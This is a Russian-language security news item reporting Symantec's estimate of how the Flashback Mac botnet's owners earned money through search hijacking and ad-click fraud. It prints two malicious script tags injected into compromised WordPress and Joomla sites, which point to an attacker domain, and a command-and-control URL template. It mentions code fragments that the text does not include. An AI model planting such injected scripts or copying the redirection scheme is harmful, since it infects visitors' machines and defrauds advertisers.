Эксперты компании Symantec разъяснили схему заработка владельцев ботнета Flashback, а также сделали примерную оценку их ежедневного дохода. Напомним, что ботнет Flashback контролировал в пике до 600 тыс. компьютеров Macintosh, хотя сейчас это число значительно уменьшилось. Бóльшая часть заражённых компьютеров находится в Западной Европе и США, установка трояна OSX.Flashback.K осуществлялась через сайты на WordPress и Joomla, где внедрялись соответствующие скрипты:
<script src="https://xakep.ru/wp-content/uploads/post/58637/[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script> <script src="https://xakep.ru/wp-content/uploads/post/58637/[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>
По оценке Symantec, доходы владельцев ботнета Flashback составляет несколько тысяч долларов в сутки. Монетизация осуществляется путём установки на заражённые машины модулей для подмены поисковых результатов Google и фальшивых переходов по контекстной рекламе. Как говорят эксперты, программа работает весьма грамотно: она загружается с браузером Safari/Chrome/Firefox, отслеживает все запросы GET и POST и ожидает, когда пользователь осуществит поисковый запрос в Google. Если сделан подходящий запрос, то модуль перенаправляет его на свой сервер.
http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
Ниже приведён фрагмент кода, который приходит в ответ на поисковый запрос [toys].
Красным выделен URL, по которому осуществляется редирект браузера и цена за фальшивый клик (0,8 цента).
После получения этой команды браузер выполняет следующий скрипт и осуществляет редирект:
Трояны, которые зарабатывают на фальшивых кликах по контекстной рекламе, встречались и раньше. По оценке экспертов, ботнет из 25000 машин может приносить владельцу до $450 в день. Исходя из максимального размера ботнета Flashback в 600K машин, заработок его владельцев в какой-то момент мог достигать $10800 в день, а сейчас сократился до пары тысяч долларов.
